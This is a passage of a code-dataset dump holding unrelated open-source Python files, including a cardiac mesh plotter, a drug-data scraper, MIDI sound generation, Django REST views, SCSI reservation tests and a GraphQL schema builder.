plotter.show(window_size=window_size)\n \n # metrics\n \n def _resolve_exm(self, key):\n all_exm = self.explainable_metrics.all(key)\n if len(all_exm) == 0:\n raise RuntimeError(\"No explainable metric for longitudinal distance was found. \"\n \"Did you compute it or loaded from a file? \"\n \"Only metrics compute with this package can be used for 3D plot.\")\n return all_exm\n \n def _resolve_ss_sa(self, exms, key):\n approaches = set()\n speckles = deque()\n for exm in exms.values():\n approaches.add(exm.approach)\n speckles.append(exm.speckles)\n \n if len(approaches) > 1:\n raise RuntimeError(\"Multiple approaches found for '{}'.\"\n \"Currently, only one approach must be selected to plot.\"\n .format(key))\n approach = list(approaches)[0]\n spk_deque = SpeckeDeque(speckles)\n return approach, spk_deque\n \n def plot_longitudinal_distance(self, t=0.0, colors=None, \n window_size=None, plot_kwargs=None, log_level=logging.INFO):\n from project_heart.utils import lines_from_points\n log = logger.getChild(\"plot_longitudinal_distance\")\n log.setLevel(log_level)\n \n key = self.STATES.LONGITUDINAL_DISTANCE\n all_exm = self._resolve_exm(key)\n \n use_exm = all_exm.all(\"base\")\n if len(use_exm) == 0:\n log.warn(\"No 'base' explainable metric was found. 
Will use all values found, \"\n \"but lines might be duplicated during plot.\")\n use_exm = all_exm\n \n # resolve plotter and window size\n window_size = self._reolve_window_size(window_size)\n plotter = self._resolve_plotter(None, plot_kwargs, t=t)\n \n if colors is None:\n colors = [\"green\", \"orange\", \"brown\", \"blue\", \"red\"]\n idx = self.states.get_timestep_index(t)\n apex_ts = deque()\n base_ts = deque()\n for i, exm in enumerate(use_exm.values()):\n # get apex and base at given timestep\n apex = exm.apex[idx]\n base = exm.base[idx]\n # create long line for plot\n line = lines_from_points((apex, base))\n # add line mesh\n plotter.add_mesh(line, color=colors[i])\n # add points\n plotter.add_points(np.vstack([apex, base]), color=colors[i], point_size=400)\n apex_ts.append(apex)\n base_ts.append(base)\n # reduce values\n apex_reduced = np.mean(apex_ts, axis=0)\n base_reduced = np.mean(base_ts, axis=0)\n # create long line for plot\n line = lines_from_points((apex_reduced, base_reduced))\n # add line mesh\n plotter.add_mesh(line, color=\"magenta\")\n # add points\n plotter.add_points(np.vstack([apex_reduced, base_reduced]), color=\"magenta\", point_size=400)\n # show plot\n plotter.show(window_size=window_size)\n \n def plot_radial_distance(self,\n t=0.0,\n window_size=None,\n plotter=None,\n plot_kwargs=None,\n log_level=logging.INFO,\n ):\n \n from project_heart.utils import project_pt_on_line\n log = logger.getChild(\"plot_radial_distance\")\n log.setLevel(log_level)\n # set key\n key = self.STATES.RADIAL_DISTANCE\n all_exm = self._resolve_exm(key)\n # resolve plotter and window size\n window_size = self._reolve_window_size(window_size)\n plotter = self._resolve_plotter(None, plot_kwargs, t=t)\n # resolve simple speckle and singular approach \n approach, spk_deque = self._resolve_ss_sa(all_exm, key)\n # reolved variables to plot\n if approach == \"moving_vector\":\n fla=False\n apex_ts = self.states.get(self.STATES.APEX_REF, t=t)\n base_ts = self.states.get(self.STATES.BASE_REF, t=t)\n elif approach == \"fixed_vector\":\n fla=True\n apex_ts = self.states.get(self.STATES.APEX_REF, t=0)\n base_ts = self.states.get(self.STATES.BASE_REF, t=0)\n else:\n raise RuntimeError(\"Invalid approach found: {}\".format(approach))\n # plot radial distance\n spk_pts = self.get_speckles_xyz(spk_deque, t=t) \n for pt in spk_pts:\n p_pt = project_pt_on_line(pt, apex_ts, base_ts)\n plotter.add_lines(np.vstack((pt, p_pt)), color=\"magenta\")\n # plot speckles\n plotter = self.plot_speckles(spk_deque, \n t=t,\n show_longitudinal_line=True, \n fix_longitudinal_line=fla,\n plotter=plotter,\n re=True,\n )\n # show plot\n plotter.show(window_size=window_size)\n \n def plot_radial_length(self,\n t=0.0,\n window_size=None,\n plotter=None,\n plot_kwargs=None,\n log_level=logging.INFO,\n ):\n\n log = logger.getChild(\"plot_radial_length\")\n log.setLevel(log_level)\n # set key\n key = self.STATES.RADIAL_LENGTH\n all_exm = self._resolve_exm(key)\n # resolve plotter and window size\n window_size = self._reolve_window_size(window_size)\n plotter = self._resolve_plotter(None, plot_kwargs, t=t)\n # resolve simple speckle and singular approach \n approach, spk_deque = self._resolve_ss_sa(all_exm, key)\n # reolved variables to plot\n if approach == \"moving_centers\":\n fla=False\n elif approach == \"fixed_centers\":\n fla=True\n else:\n raise RuntimeError(\"Invalid approach found: {}\".format(approach))\n \n # plot radial distance\n # spk_pts = self.get_speckles_xyz(spk_deque, t=t)\n la_centers = 
self.get_speckles_la_centers(spk_deque, t=t)\n \n for spk, lapt in zip(spk_deque, la_centers):\n xyz = self.states.get(self.STATES.XYZ, t=t, mask=spk.ids)\n for pt in xyz:\n plotter.add_lines(np.vstack((pt, lapt)), color=\"magenta\")\n \n # plot speckles\n plotter = self.plot_speckles(spk_deque, \n t=t,\n show_longitudinal_line=True, \n show_la_centers=True,\n fix_longitudinal_line=fla,\n plotter=plotter,\n re=True,\n )\n # show plot\n plotter.show(window_size=window_size)","repo_name":"Nobregaigor/Project-Heart","sub_path":"project_heart/lv/modules/lv_metrics_3d_plotter.py","file_name":"lv_metrics_3d_plotter.py","file_ext":"py","file_size_in_byte":13043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71455306612","text":"# STARTING WITH AN EMPTY DICTIONARY\n# It is sometimes convenient or even necessary to start with an empty\n# dictionary and then add each new item to it. Here is how to build a\n# dictionary using this approach:\n\nalien_0 = {}\n\nalien_0['color'] = 'green'\nalien_0['points'] = 5\n\nprint(alien_0)\n\n# TYPICALLY YOU'LL USE EMPTY DICTIONARIES WHEN STORING USER-SUPPLIED\n# DATA IN A DICTIONARY OR WHEN YOU WRITE CODE THAT GENERATES A LARGE\n# NUMBER OF KEY-VALUE PAIRS AUTOMATICALLY.\n\n","repo_name":"ctrlshftejct/pythoncc","sub_path":"2019/chapter6/alien_startingempty.py","file_name":"alien_startingempty.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30852315176","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom search import engine\nimport pickle\n\nclass Molecule:\n\tdef __init__(self, disease, drug_name, molecule_name, smiles):\n\t\tself.disease = disease\n\t\tself.drug_name = drug_name\n\t\tself.smiles = smiles\n\t\tself.molecule_name = molecule_name\n\t\treturn\n\ndef molecule_name_to_smiles(molecule_name):\n\tlink = \"https://www.ncbi.nlm.nih.gov/pccompound?term=\" + molecule_name.replace(' ', '%20')\n\tr = requests.get(link).content\n\tsoup = BeautifulSoup(r, 'html.parser')\n\tlink = soup.find('p', attrs={'class': 'title'})\n\tif link != None:\n\t\tfor i in link:\n\t\t\tsoup = BeautifulSoup(str(i))\n\t\t\tfor a in soup.find_all('a', href=True):\n\t\t\t\tlink = a['href'] + \"end\" \n\t\t\t\ts = link \n\t\t\t\tstart = 'compound/'\n\t\t\t\tend = 'end' \n\t\t\t\ts = s[s.find(start)+len(start):s.rfind(end)]\n\t\t\t\tlink = \"https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/cid/\" + s + \"/property/CanonicalSMILES/txt\"\n\t\t\t\tsmiles = requests.get(link).text\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\treturn smiles \n\treturn \"\"\t\t\t\n\ndef extract_content(soup):\n\tlinks = soup.find_all('a', attrs={'class': 'ToggleDrugCategory'})\n\tdivs = soup.find_all('div', attrs={'class': 'CategoryListSection'}) \n\tresults = []\n\n\tfor i in range(0, len(links)):\n\t\tdisease_title = links[i].text\t\t\n\t\tfor j in divs[i].select(\"a\"):\n\t\t\tif \"/drug/\" in j[\"href\"]:\t\t\t\t\n\t\t\t\tdrug_name = j.text\n\t\t\t\tmolecule_name = drug_name[drug_name.find(\"(\")+1:drug_name.find(\")\")]\t\t\n\t\t\t\tsmiles = molecule_name_to_smiles(molecule_name)\n\t\t\t\tif smiles != \"\":\n\t\t\t\t\tmol = Molecule(disease=disease_title, drug_name=drug_name, molecule_name=molecule_name, smiles=smiles)\t\n\t\t\t\t\tresults.append(mol)\t\t\t\t\t\t\t\t\t\n\t\t\t\t\tprint(\"Created Molecule\")\t\t\t\t\t\t\t\t\t\t\n\treturn results\t\t\t\t\t\n\ndef scrape_letter(letter):\n\tlink = 
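# molecule_name_to_smiles above ultimately calls PubChem's PUG REST service;
# the same property lookup works directly from a known compound id (CID),
# e.g. aspirin, CID 2244:
import requests

url = ('https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/cid/2244'
       '/property/CanonicalSMILES/txt')
print(requests.get(url).text.strip())  # expected: CC(=O)OC1=CC=CC=C1C(=O)O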
'https://www.centerwatch.com/drug-information/fda-approved-drugs/medical-conditions/' + letter\n\tr = requests.get(link)\n\tcontent = r.text\n\tsoup = BeautifulSoup(content, \"html5lib\")\n\tresults = extract_content(soup)\n\treturn results\n\n'''\nres = []\nfor letter in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']:\n\tprint(\"Searching section\", letter)\n\tresult = scrape_letter(letter)\n\tfor i in result:\n\t\tres.append(i)\n\nwith open(\"RESULT.pkl\", 'wb') as output: \n\tprint \"Saving...\"\n\tpickle.dump(res, output)\t\nprint(\"script done!\")\t\t\n'''\n","repo_name":"michael13162/novogen","sub_path":"model/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}\n+{"seq_id":"3780273451","text":"def isApalindrome(str):\r\n startindex = 0\r\n endindex = len(str) - 1\r\n\r\n while startindex < endindex:\r\n if str[startindex] != str[endindex]:\r\n return False\r\n startindex += 1\r\n endindex -= 1\r\n return True\r\n\r\nk = input('Enter a word to check palindrome or not: ')\r\nprint(isApalindrome(k))","repo_name":"ap4ashutosh/Meta_backend_development_python_course","sub_path":"21_Test_palindrome.py","file_name":"21_Test_palindrome.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"74026129652","text":"import os\nimport subprocess\nfrom time import sleep\n\nfrom midiutil import MIDIFile\n\n\ntrack = 0\nchannel = 0\nstart_time = 0 # In beats\nduration = 1 # In beats\ntempo = 600 # In BPM\nvolume = 100 # 0-127, as per the MIDI standard\nmax_volume = 127\n\n\ndef newMidi(program):\n midi = MIDIFile(1) # One track\n midi.addTempo(track, start_time, tempo)\n midi.addProgramChange(track, channel, start_time, program)\n return midi\n\n\ndef generateSoundFile(midi, filepath, fade_start_sec, trim_sec, volume=1.0):\n with open('tmp.midi', 'wb') as output_file:\n midi.writeFile(output_file)\n subprocess.run(['timidity', 'tmp.midi', '-Ow', '-o', 'tmp.wav'],\n stdout=subprocess.DEVNULL)\n ffmpeg_command = ['ffmpeg', '-y', '-i', 'tmp.wav',\n '-af', 'volume={},afade=out:st={}:d={}'.format(\n volume, fade_start_sec, trim_sec - fade_start_sec),\n '-to', '{}'.format(trim_sec),\n filepath]\n print(' '.join(ffmpeg_command))\n subprocess.run(ffmpeg_command,\n stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n\n\n# C4 major scale: 60, 62, 64, 65, 67, 69, 71, 72\ndegrees = [\n [60],\n [64],\n [67],\n [72],\n [72, 76, 79],\n]\nmax_combo = len(degrees)\n\ntime_over_degrees = [60, 60]\nbonus_time_over_degrees = [60]\n\ntime_over_program = 28\ntime_over_volume_coeff = 2.0\n\nfor combo in range(0, max_combo):\n midi = newMidi(program=13)\n for note in degrees[combo]:\n midi.addNote(track, channel, note, start_time, duration, volume)\n generateSoundFile(midi,\n 'word_guessed_combo{:01}.ogg'.format(combo),\n fade_start_sec=0.9,\n trim_sec=1.0)\n\nmidi = newMidi(program=time_over_program)\ntime = 0\nfor note in time_over_degrees:\n time += 1\n midi.addNote(track, channel, note, time, duration, max_volume)\ngenerateSoundFile(midi,\n 'time_over.ogg',\n fade_start_sec=0.9,\n trim_sec=1.0,\n volume=time_over_volume_coeff)\n\nmidi = newMidi(program=time_over_program)\ntime = 0\nfor note in bonus_time_over_degrees:\n time += 1\n midi.addNote(track, channel, note, time, duration, max_volume)\ngenerateSoundFile(midi,\n 'bonus_time_over.ogg',\n fade_start_sec=0.9,\n 
trim_sec=1.0,\n volume=time_over_volume_coeff)\n\nos.remove('tmp.midi')\nos.remove('tmp.wav')\n\n# Melody test:\n#\n# beat_len = 10\n# midi = MIDIFile(1) # One track\n# midi.addTempo(track, time, tempo)\n# midi.addProgramChange(track, channel, time, program)\n# for combo in range(0, max_combo):\n# time = combo * beat_len\n# for note in degrees[combo]:\n# midi.addNote(track, channel, note, time, duration, volume)\n# turn_end = max_combo * beat_len + 4\n# midi.addProgramChange(track, channel, turn_end, end_program)\n# for combo in range(0, len(end_degrees)):\n# time = turn_end + combo * 20\n# for note in end_degrees[combo]:\n# midi.addNote(track, channel, note, time, duration, volume)\n# with open('tmp.mid', 'wb') as output_file:\n# midi.writeFile(output_file)\n# subprocess.run(['timidity', 'tmp.mid'], stdout=subprocess.DEVNULL)\n\n# Program test:\n#\n# for program in [4, 7, 10, 14, 15, 26, 41, 55, 96, 104, 112, 113, 115, 116]:\n# for program in range(0, 128):\n# print(program)\n# midi = MIDIFile(1)\n# midi.addTempo(track, time, tempo)\n# midi.addProgramChange(track, channel, time, program)\n# midi.addNote(track, channel, degrees[0][0], time, duration, volume)\n# with open('tmp.mid', 'wb') as output_file:\n# midi.writeFile(output_file)\n# subprocess.Popen(['timidity', 'tmp.mid'], stdout=subprocess.DEVNULL)\n# sleep(1)\n\n# Candidate programs: 8, 11, 12, 13, 112\n# Candidate for 'game over': 4, 7, 10, 14, 15, 26, 41, 55, 96, 104, 112, 113, 115*2, 116\n","repo_name":"amatveiakin/hat-game","sub_path":"tools/sound_gen/guessed_sound_gen.py","file_name":"guessed_sound_gen.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73233720694","text":"import json\nfrom django.http import HttpResponse\nfrom django_swagger_utils.drf_server.utils.decorator.interface_decorator \\\n import validate_decorator\nfrom .validator_class import ValidatorClass\nfrom content_management_portal.interactors.swap_hints_interactor import\\\n SwapHintsInteractor\nfrom content_management_portal.storages.hint_storage_implementation \\\n import HintStorageImplementation\nfrom content_management_portal.storages.question_storage_implementation \\\n import QuestionStorageImplementation\nfrom content_management_portal.presenters.presenter_implementation import\\\n PresenterImplementation\n\n\n@validate_decorator(validator_class=ValidatorClass)\ndef api_wrapper(*args, **kwargs):\n question_id = kwargs['question_id']\n hints_swap_details =kwargs['request_data']\n hint_storage = HintStorageImplementation()\n presenter = PresenterImplementation()\n question_storage = QuestionStorageImplementation()\n interactor = SwapHintsInteractor(\n hint_storage=hint_storage,\n presenter=presenter,\n question_storage=question_storage\n )\n response = interactor.swap_hints(\n question_id=question_id,\n hints_swap_details=hints_swap_details\n )\n json_response = json.dumps(response)\n return HttpResponse(json_response, status=200)\n","repo_name":"bammidichandini/content_management_portal","sub_path":"content_management_portal/views/swap_coding_question_hints/api_wrapper.py","file_name":"api_wrapper.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6430897316","text":"#!/usr/bin/python\n\"\"\"\nPython tests for SCSI-3 Persistent Group Reservations\n\nDescription:\n This module tests Registration. See ... 
for more details.\n\"\"\"\n\n\n__author__ = \"Lee Duncan \"\n\n\nimport sys\nimport os\nfrom copy import copy\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\nfrom support.initiator import initA, initB, initC\nfrom support.setup import set_up_module\n\n################################################################\n\ndef setUpModule():\n \"\"\"Whole-module setup\"\"\"\n set_up_module(initA, initB, initC)\n\n################################################################\n\ndef my_reg_setup():\n \"\"\"make sure we are all setup to test reservations\"\"\"\n if initA.unregister() != 0:\n initA.unregister()\n if initB.unregister() != 0:\n initB.unregister()\n initC.runTur()\n\n################################################################\n\nclass test01CanRegisterTestCase(unittest.TestCase):\n \"\"\"Can register initiators\"\"\"\n\n def setUp(self):\n my_reg_setup()\n\n def testCanRegisterInitA(self):\n resA = initA.register()\n self.assertEqual(resA, 0)\n\n def testCanRegisterInitB(self):\n resB = initB.register()\n self.assertEqual(resB, 0)\n\n################################################################\n\nclass test02CanSeeRegistrationsTestCase(unittest.TestCase):\n \"\"\"Can see initiator registration\"\"\"\n\n def setUp(self):\n my_reg_setup()\n\n def testCanSeeNoRegistrations(self):\n registrantsA = initA.getRegistrants()\n self.assertEqual(len(registrantsA), 0)\n\n def testCanSeeRegistrationOnFirstRegistrant(self):\n res = initA.register()\n self.assertEqual(res, 0)\n res = initB.register()\n self.assertEqual(res, 0)\n registrantsA = initA.getRegistrants()\n self.assertEqual(len(registrantsA), 2)\n self.assertIn(initA.key, registrantsA)\n self.assertIn(initB.key, registrantsA)\n\n def testCanSeeRegOnSecondRegistrant(self):\n resA = initA.register()\n self.assertEqual(resA, 0)\n res = initB.register()\n self.assertEqual(res, 0)\n registrantsB = initB.getRegistrants()\n self.assertEqual(len(registrantsB), 2)\n self.assertIn(initA.key, registrantsB)\n self.assertIn(initB.key, registrantsB)\n\n def testCanSeeRegOnNonRegistrant(self):\n resA = initA.register()\n self.assertEqual(resA, 0)\n res = initB.register()\n self.assertEqual(res, 0)\n registrantsC = initC.getRegistrants()\n self.assertEqual(len(registrantsC), 2)\n self.assertIn(initA.key, registrantsC)\n self.assertIn(initB.key, registrantsC)\n\n################################################################\n\nclass test03CanUnregisterTestCase(unittest.TestCase):\n \"\"\"Can Unregister\"\"\"\n\n def setUp(self):\n my_reg_setup()\n initA.register()\n initB.register()\n\n def testCanUnregister(self):\n res = initA.unregister()\n self.assertEqual(res, 0)\n registrants = initA.getRegistrants()\n self.assertEqual(len(registrants), 1)\n res = initB.unregister()\n self.assertEqual(res, 0)\n registrants = initB.getRegistrants()\n self.assertEqual(len(registrants), 0)\n\n################################################################\n\nclass test04ReregistrationFailsTestCase(unittest.TestCase):\n \"\"\"Cannot reregister\"\"\"\n\n def setUp(self):\n my_reg_setup()\n initA.register()\n initB.register()\n\n def testReregisterFails(self):\n initAcopy = copy(initA)\n initAcopy.key = \"0x1\"\n resA = initAcopy.register()\n self.assertNotEqual(resA, 0)\n registrantsA = initA.getRegistrants()\n self.assertEqual(len(registrantsA), 2)\n self.assertIn(initA.key, registrantsA)\n self.assertIn(initB.key, registrantsA)\n\n################################################################\n\nclass 
test05RegisterAndIgnoreTestCase(unittest.TestCase):\n \"\"\"Can Register And Ignore\"\"\"\n\n def setUp(self):\n my_reg_setup()\n initA.register()\n initB.register()\n\n def testCanRegisterAndIgnore(self):\n # register with key \"0x1\"\n initAcopy = copy(initA)\n initAcopy.key = \"0x1\"\n result = initA.registerAndIgnore(initAcopy.key)\n self.assertEqual(result, 0)\n registrantsA = initAcopy.getRegistrants()\n self.assertNotIn(initA.key, registrantsA)\n self.assertIn(initAcopy.key, registrantsA)\n # re-register with normal key\n result = initAcopy.registerAndIgnore(initA.key)\n self.assertEqual(result, 0)\n registrantsA = initA.getRegistrants()\n self.assertNotIn(initAcopy.key, registrantsA)\n self.assertIn(initA.key, registrantsA)\n","repo_name":"gonzoleeman/open-iscsi-pgr-validate","sub_path":"tests/testRegister.py","file_name":"testRegister.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}\n+{"seq_id":"40986362930","text":"MAGIC = b\"\\xDC\\xDC\\x0D\\x0A\\x1A\\x0A\\x00\"\n\n\ndef read(stream):\n head = stream.read(len(MAGIC) + 1)\n if len(head) != len(MAGIC) + 1 or head[: len(MAGIC)] != MAGIC:\n return False\n lenbyte = head[len(MAGIC)]\n is_uuid = lenbyte == 0\n length = 16 if is_uuid else lenbyte\n sig = stream.read(length)\n if len(sig) != length:\n return False\n return sig if is_uuid else sig.decode(\"utf-8\", errors=\"strict\")\n\n\ndef write(stream, name):\n if isinstance(name, bytes):\n assert len(name) == 16\n sig = name\n is_uuid = True\n else:\n assert isinstance(name, str)\n sig = name.encode(\"utf-8\", errors=\"strict\")\n is_uuid = False\n stream.write(MAGIC)\n stream.write(bytes([0 if is_uuid else len(sig)]))\n stream.write(sig)\n","repo_name":"unisig/lib","sub_path":"python-3/unisig.py","file_name":"unisig.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"73995861172","text":"#!/usr/bin/env python\r\n# importing required modules\r\nimport PyPDF2\r\n###\r\ndef PDFmerge(pdfs, output):\r\n # creating pdf file merger object\r\n pdfMerger = PyPDF2.PdfFileMerger()\r\n\r\n # appending pdfs one by one\r\n for pdf in pdfs:\r\n with open(pdf, 'rb') as f:\r\n pdfMerger.append(f)\r\n\r\n # writing combined pdf to output pdf file\r\n with open(output, 'wb') as f:\r\n pdfMerger.write(f)\r\n\r\ndef main():\r\n # pdf files to merge\r\n pdfs = ['2018 CFA ENV UI 18-15211.pdf', '2018 CFA ENV PU 18-15211.pdf']\r\n\r\n # output pdf file name\r\n output = '2018 CFA ENV 18-15211.pdf'\r\n\r\n # calling pdf merge function\r\n PDFmerge(pdfs = pdfs, output = output)\r\n\r\nif __name__ == \"__main__\":\r\n # calling the main function\r\n main()\r\n# EOF\r\n","repo_name":"TheDoctorRAB/utilities","sub_path":"python-util/merge.pdf.py","file_name":"merge.pdf.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"30084519320","text":"import numpy as np\n\ndef matReg(y,u,ny,nu):\n # for debugging the code\n # y= np.array([1, 2, 3,4,5,6,7,8,9,10])\n # u= np.array([1, 2, 3,4,5,6,7,8,9,10])\n\n p = np.max((ny,nu)) + 1\n (N,) = y.shape\n (Nu,) = u.shape\n \n # sanity check\n if N != Nu:\n print('Dimensions of u and y vector are not consistent')\n return (-1,-1)\n \n # create target vector\n target = y[p-1:N]\n\n # create regression matrix\n Phi = np.zeros((N-p+1,ny+nu))\n for i in range(ny):\n Phi[:,i] = y[p-i-2: N - 
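# A minimal round-trip sketch for the unisig read/write pair above, using an
# in-memory stream (passing 16 raw bytes instead would take the UUID branch):
import io

buf = io.BytesIO()
write(buf, 'example.org/my-format')  # hypothetical signature string
buf.seek(0)
assert read(buf) == 'example.org/my-format'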
i-1].reshape(-1)\n\n for i in range(nu):\n Phi[:,i+ny] = u[p-i-2: N - i-1].reshape(-1)\n\n return (target, Phi)\n\ndef freeRun(model, y, u,ny,nu):\n p = max(ny,nu) + 1 \n (N,) = y.shape\n\n yhat = np.zeros(N)\n yhat[:p-1] = y[:p-1].reshape(-1) # include initial conditions\n\n for k in range(p,N+1):\n # print(k)\n auxY = np.concatenate(( yhat[(k-p):(k-1)].reshape(-1) , (0,) ),axis=0)\n auxU = np.concatenate(( u [(k-p):(k-1)].reshape(-1) , (0,) ),axis=0)\n \n _,fr_input = matReg(auxY,auxU,ny,nu)\n yhat[k-1] = model.predict(fr_input)\n # return only the values that are predictions\n # (remove the initial conditions)\n return yhat[-(N-p+1):] ","repo_name":"prj-phcp/SYSID_Atividades","sub_path":"Atividade09/sysid_utils.py","file_name":"sysid_utils.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}\n+{"seq_id":"33177432815","text":"\"\"\"\nGET, POST\nGet all articles: fetch all records; output structure: { id, url_id, title, date, content}\nGet a single article: given an id; output structure: { id, url_id, title, date, content}\nCreate: must provide title, date (validated as a date format) and content; url_id uses /Popular/Detail/ + a sequence number, id is generated automatically\n\nPUT\nUpdate: given an id (validated as a number), may modify title, date (validated as a date format) or content\n\nDELETE\nDelete: delete by id; provide the api id (validated as a number)\n\"\"\"\n\n\nfrom django.shortcuts import render\nfrom .serializers import NewsModelSerializer\nfrom django.http import JsonResponse\nfrom django.http.response import JsonResponse\nfrom rest_framework.parsers import JSONParser \nfrom rest_framework import status\nfrom rest_framework.decorators import api_view, permission_classes\nfrom .models import News\nfrom rest_framework.permissions import IsAuthenticated\n\n\n\n@api_view(['GET', 'POST'])\n@permission_classes([IsAuthenticated])\ndef dailyview_list(request):\n\n if request.method == 'GET':\n \n news_lst = News.objects.all()\n news_serializer = NewsModelSerializer(news_lst, many=True)\n return JsonResponse(news_serializer.data, safe=False)\n \n elif request.method == 'POST':\n news_data = JSONParser().parse(request)\n news_serializer = NewsModelSerializer(data=news_data)\n if news_serializer.is_valid():\n news_serializer.save()\n return JsonResponse(news_serializer.data, status=status.HTTP_201_CREATED) \n return JsonResponse(news_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n\n@api_view(['GET', 'PUT', 'DELETE'])\n@permission_classes((IsAuthenticated, ))\ndef dailyview_detail(request, pk):\n\n # print('request', request)\n # print('pk', pk)\n try: \n news_item = News.objects.get(pk=pk) \n except News.DoesNotExist: \n return JsonResponse({'message': 'No such article in hot news'}, status=status.HTTP_404_NOT_FOUND) \n \n if request.method == 'GET': \n news_serializer = NewsModelSerializer(news_item) \n return JsonResponse(news_serializer.data) \n \n elif request.method == 'PUT': \n news_data = JSONParser().parse(request) \n print('news_data', news_data)\n print('news_item', news_item)\n news_serializer = NewsModelSerializer(news_item, data=news_data, partial=True) \n if news_serializer.is_valid():\n news_serializer.save() \n return JsonResponse(news_serializer.data) \n return JsonResponse(news_serializer.errors, status=status.HTTP_400_BAD_REQUEST) \n \n elif request.method == 'DELETE': \n news_item.delete() \n return JsonResponse({'message': 'This article has been deleted!'}, 
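# A minimal sketch of the intended workflow for matReg/freeRun above, assuming
# a scikit-learn style model (any object with fit/predict should work) and
# toy placeholder data for the measured input/output sequences:
import numpy as np
from sklearn.linear_model import LinearRegression

u = np.random.rand(100)                       # toy input sequence
y = np.convolve(u, [0.5, 0.3], mode='same')   # toy output sequence
target, Phi = matReg(y, u, 2, 1)              # build the ARX regressors
model = LinearRegression().fit(Phi, target)   # one-step-ahead fit
yhat = freeRun(model, y, u, 2, 1)             # free-run simulation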
status=status.HTTP_204_NO_CONTENT)\n\n\n\n\n\n\n\n","repo_name":"wu0up/DV_project","sub_path":"hot_news_project/myproject/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40509062700","text":"from euler.big_int import BigInt\n\n\ndef compute() -> BigInt:\n number = BigInt(138_902_663)\n j = 3\n while not all((number * number)[i * 2] == str(i + 1) for i in range(9)):\n if j == 3:\n number -= 6\n j = 7\n else:\n number -= 4\n j = 3\n return number * 10\n","repo_name":"Dynortice/Project-Euler","sub_path":"problems/0206/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41051202781","text":"from ariadne import make_executable_schema\nfrom ariadne import QueryType\nfrom guillotina.catalog.utils import get_index_fields\nfrom guillotina.component import get_utilities_for\nfrom guillotina.interfaces import IResourceFactory\nfrom guillotina_graphql.mappings import CATALOG_TO_GRAPHQL_MAPPING\nfrom guillotina_graphql.mappings import FIELD_DIRECTIVES_TO_GRAPHQL\n\nquery = QueryType()\ngraphql_schema = None\n\n\ndef build_graphql_schema():\n global graphql_schema\n\n graphql_schema = make_executable_schema(get_type_defs(), query)\n\n\ndef _iter_model_indices():\n for type_name, schema in get_utilities_for(IResourceFactory):\n for field_name, catalog_info in get_index_fields(type_name).items():\n if field_name in FIELD_DIRECTIVES_TO_GRAPHQL:\n yield type_name, field_name, {\n \"gql_type\": FIELD_DIRECTIVES_TO_GRAPHQL[field_name]\n }\n else:\n yield type_name, field_name, catalog_info\n\n\ndef _get_model_fields_and_types():\n # TODO: cache result?\n result_types = {}\n for model, field, directive in _iter_model_indices():\n if model not in result_types:\n result_types[model] = {}\n\n index_name = directive.get(\"index_name\") or field\n type_ = directive.get(\"gql_type\")\n if not type_:\n type_ = CATALOG_TO_GRAPHQL_MAPPING[directive[\"type\"]]\n\n result_types[model][index_name] = {\"type\": type_}\n return result_types\n\n\ndef dict_types_to_graphql_str(dict):\n return \"\\n \".join(f\"{field}: {value['type']}\" for field, value in dict.items())\n\n\ndef _get_input_search_query():\n result_types = _get_model_fields_and_types()\n search_query_fields = {}\n for model in result_types:\n for index_name, directive in result_types[model].items():\n search_query_fields[index_name] = directive\n\n search_query_raw = \"\\n \".join(\n f\"{field}: {value['type']}\"\n if \"default\" not in value\n else f\"{field}: {value['type']} = {value['default']}\"\n for field, value in search_query_fields.items()\n )\n return f\"\"\"\ninput SearchQuery {{\n _size: Int = 10\n {search_query_raw}\n}}\n\"\"\"\n\n\ndef _get_models():\n result_types = _get_model_fields_and_types()\n\n model_types = []\n for model, types in result_types.items():\n model_types += [\n f\"\"\"\ntype {model} implements IItem {{\n {dict_types_to_graphql_str(types)}\n}}\"\"\"\n ]\n model_types_str = \"\\n\".join(model_types)\n\n schema = f\"\"\"\ninterface IItem {{\n {dict_types_to_graphql_str(result_types['Item'])}\n}}\n\n{model_types_str}\n\nunion SearchResult = {\" | \".join(result_types)}\n\"\"\"\n return schema\n\n\ndef get_type_defs():\n return f\"\"\"\n{_get_input_search_query()}\n\n{_get_models()}\n\ntype Query {{\n search(query: SearchQuery): 
